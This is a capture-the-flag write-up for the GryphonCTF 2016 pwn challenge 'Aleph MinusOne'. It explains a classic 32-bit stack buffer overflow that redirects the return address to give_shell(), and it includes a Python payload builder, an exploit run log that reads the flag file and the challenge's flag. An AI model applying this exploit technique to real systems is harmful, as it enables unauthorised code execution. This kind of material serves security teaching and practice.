GryphonCTF_2016: Aleph MinusOne
Category: Pwn
Points: 15
Description: Do Aleph One proud. nc play.spgame.site 1346
Creator - Jeremy Heng (@amon)
Write-up
Credits to @zst123 [Manzel Seet] for helping to discover the exploit buffer length.
Now we are given a chance to do a buffer overflow!
$ nc play.spgame.site 1346
Base Pointer: 0xffb83368
Address of Buffer: 0xffb832e0
Size of buffer: 128
give_shell() function: 0x804852d
Your exploit string: d
Contents of Buffer: d
Return Address: 0x8048633
We know that the give_shell() function is at 0x804852d. We also know that the size of the buffer is 128, so by adding 12 bytes of padding and then appending the give_shell() address to overwrite the saved return address (RET), we gain a shell.
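The offset arithmetic behind the "128 + 12" above, as an added example that is not the author's script.py: it takes the base pointer and buffer address the service prints and works out where the saved EBP and the return address sit relative to the buffer, then packs the give_shell() address little-endian for a 32-bit x86 stack. The constants are the values printed in the session above; the function names are my own.

```python
import struct

# Values as printed by the challenge service in the session above.
BASE_POINTER = 0xffb83368   # EBP of the vulnerable frame
BUFFER_ADDR  = 0xffb832e0   # start of the 128-byte buffer
BUFFER_SIZE  = 128
GIVE_SHELL   = 0x804852d    # address of give_shell()


def frame_layout(buffer_addr, base_pointer, buffer_size):
    """Describe the 32-bit x86 frame: the saved EBP is at [ebp] and the
    return address at [ebp+4]; anything between the end of the buffer and
    the saved EBP is compiler padding/alignment (8 bytes here)."""
    padding = base_pointer - (buffer_addr + buffer_size)
    return {
        "buffer_end": buffer_addr + buffer_size,
        "padding_after_buffer": padding,
        "saved_ebp": base_pointer,
        "return_address_slot": base_pointer + 4,
    }


def ret_offset(buffer_addr, base_pointer):
    """Bytes from the start of the buffer to the saved return address."""
    return (base_pointer - buffer_addr) + 4


def build_payload(buffer_addr, base_pointer, target, filler=b"A"):
    """Filler up to the return-address slot, then the target address in
    little-endian order (struct '<I'), which is why the write-up's script
    reverses the byte pairs of 0x804852d."""
    return filler * ret_offset(buffer_addr, base_pointer) + struct.pack("<I", target)


if __name__ == "__main__":
    layout = frame_layout(BUFFER_ADDR, BASE_POINTER, BUFFER_SIZE)
    print(layout)                                   # padding_after_buffer: 8
    print(ret_offset(BUFFER_ADDR, BASE_POINTER))    # 140 == 128 + 12
    print(build_payload(BUFFER_ADDR, BASE_POINTER, GIVE_SHELL)[-4:].hex())
```

The offset comes out at 140 = 128 (buffer) + 8 (padding) + 4 (saved EBP), matching the 12 extra bytes in the write-up; the second run later on the page (buffer 0xffdba930, EBP 0xffdba9b8) gives the same 0x88 distance, so the layout is stable across runs even though the absolute addresses change.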
$ ./script.py
0
RECV>>>Base Pointer: 0xffdba9b8
RECV>>>Address of Buffer: 0xffdba930
Size of buffer: 128
give_shell() function: 0x804852d
Your exploit string:
['08', '04', '85', '2d']
RECV>>>Contents of Buffer: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-?
RECV>>>Return Address: 0x804852d
$ cat /home/alephuser/flag
RECV>>>GCTF{th3_op3n355_0f_t1m3}
Final script here.
Therefore, the flag is GCTF{th3_op3n355_0f_t1m3}.